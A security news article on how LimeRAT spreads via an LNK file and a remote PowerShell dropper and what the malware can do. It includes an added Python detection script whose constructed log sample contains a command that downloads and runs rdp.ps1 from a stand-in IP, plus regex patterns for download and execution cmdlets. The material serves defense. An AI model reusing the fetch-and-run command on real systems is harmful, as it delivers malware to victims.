LimeRAT leverages unique infection technique to defeat traditional security mechanisms – DigitalMunition

Published on April 10th, 2019

LimeRAT leverages unique infection technique to defeat traditional security mechanisms

  • The whole infection process begins with an LNK file.
  • The malware is capable of registering itself as ‘Critical Process’ on the infected systems.

LimeRAT is a powerful Remote Administration Tool that is publicly available to any Internet user. However, lately, it has been found that cybercriminals are using a unique infection technique to spread the malicious sample without being detected by anti-virus software.

How does the infection process start? The whole infection process begins with an LNK file, which lets the attackers download and run a PowerShell script named ‘rdp.ps1’ from a remote location. The retrieved PowerShell script is then used as the dropper in the second stage of the infection.

“This script firstly retrieves the version of the Windows OS installed on the target machine using the ‘Get-WmiObject -Class Win32_OperatingSystem | Select-Object -ExpandProperty Version’ command. Then, depending on the returned value, it runs a couple of privilege escalation exploits able to bypass the UAC (User Account Control) feature, a well-known security mechanism introduced since Vista to avoid unauthorized system configuration changes,” the Yoroi researchers wrote.
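The two behaviours described above, a PowerShell stage that fingerprints the OS version and then fetches and runs a remote .ps1 dropper, are something a defender can look for in PowerShell script-block logging. The following is an added example, not code from the Yoroi report or from LimeRAT: it runs a small set of indicators over constructed script-block records (Event ID 4104 style; the host names, the 203.0.113.7 address and the intranet URL are invented) and only alerts when several indicators co-occur, so that a plain inventory script or a legitimate script download is not flagged on its own.

```python
import re

# Constructed script-block log records for demonstration; not real telemetry.
SAMPLE_RECORDS = [
    {"id": 1, "host": "ws01",  # benign inventory script: OS version query only
     "script": "Get-WmiObject -Class Win32_OperatingSystem | Select-Object -ExpandProperty Version"},
    {"id": 2, "host": "ws02",  # version check, then fetch and execute a remote rdp.ps1
     "script": "$v = Get-WmiObject -Class Win32_OperatingSystem | Select-Object -ExpandProperty Version; "
               "(New-Object Net.WebClient).DownloadFile('http://203.0.113.7/rdp.ps1', \"$env:TEMP\\rdp.ps1\"); "
               "& \"$env:TEMP\\rdp.ps1\""},
    {"id": 3, "host": "ws03",  # benign: admin pulls a script from an internal server, no execution
     "script": "Invoke-WebRequest -Uri https://intranet.example/inventory.ps1 -OutFile C:\\Tools\\inventory.ps1"},
    {"id": 4, "host": "ws04",
     "script": "Get-ChildItem C:\\Users | Measure-Object"},
]

# Each indicator on its own is common in legitimate administration; the combination is what matters.
INDICATORS = {
    # OS version fingerprinting via WMI/CIM, as in the command quoted by the researchers
    "os_version_fingerprint": re.compile(
        r"Get-(?:WmiObject|CimInstance)\s+(?:-Class(?:Name)?\s+)?Win32_OperatingSystem.*\bVersion\b", re.I),
    # a .ps1 file retrieved over HTTP(S) with a download cmdlet, method or alias
    "remote_ps1_fetch": re.compile(
        r"(?:DownloadString|DownloadFile|Invoke-WebRequest|iwr|curl|wget)\b.*https?://[^'\"\s]+\.ps1", re.I),
    # a .ps1 invoked with the call operator or piped into Invoke-Expression
    "exec_dropped_script": re.compile(
        r"(?:\bIEX\b|Invoke-Expression|&\s*[\"'$]).*\.ps1|\.ps1[\"']?\s*\|\s*(?:IEX|Invoke-Expression)", re.I),
}


def match_indicators(script):
    """Return the sorted names of every indicator that matches one script block."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(script))


def triage(records, threshold=2):
    """Return (id, host, indicators) for records where at least `threshold` indicators co-occur."""
    hits = []
    for rec in records:
        found = match_indicators(rec["script"])
        if len(found) >= threshold:
            hits.append((rec["id"], rec["host"], found))
    return hits


if __name__ == "__main__":
    for rec_id, host, found in triage(SAMPLE_RECORDS):
        print(f"ALERT record {rec_id} on {host}: {', '.join(found)}")
```

Record 2 is the only one that trips the alert; records 1 and 3 each match a single indicator and are left alone, which is the trade-off a detection like this deliberately makes.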

What are its capabilities? A close investigation by the researchers from Cybaze-Yoroi revealed that the malware is capable of registering itself as a ‘Critical Process’ on the infected system, so that if the user tries to kill it, a Blue Screen of Death (BSoD) is displayed.

Besides this peculiar trick, the malware also includes a set of other dangerous capabilities such as:

  • USB drive propagation;
  • Infecting all files and folders on USB drives;
  • Using startup methods to evade detection;
  • Virtual machines and analysis box awareness to avoid detection;
  • Info-stealer and Crypto-stealer modules;
  • Keylogger module;
  • Backdoor and RDP access.

Upon successful installation, the malware’s command-and-control infrastructure abuses the Pastebin service to gain persistence on the victim’s system.
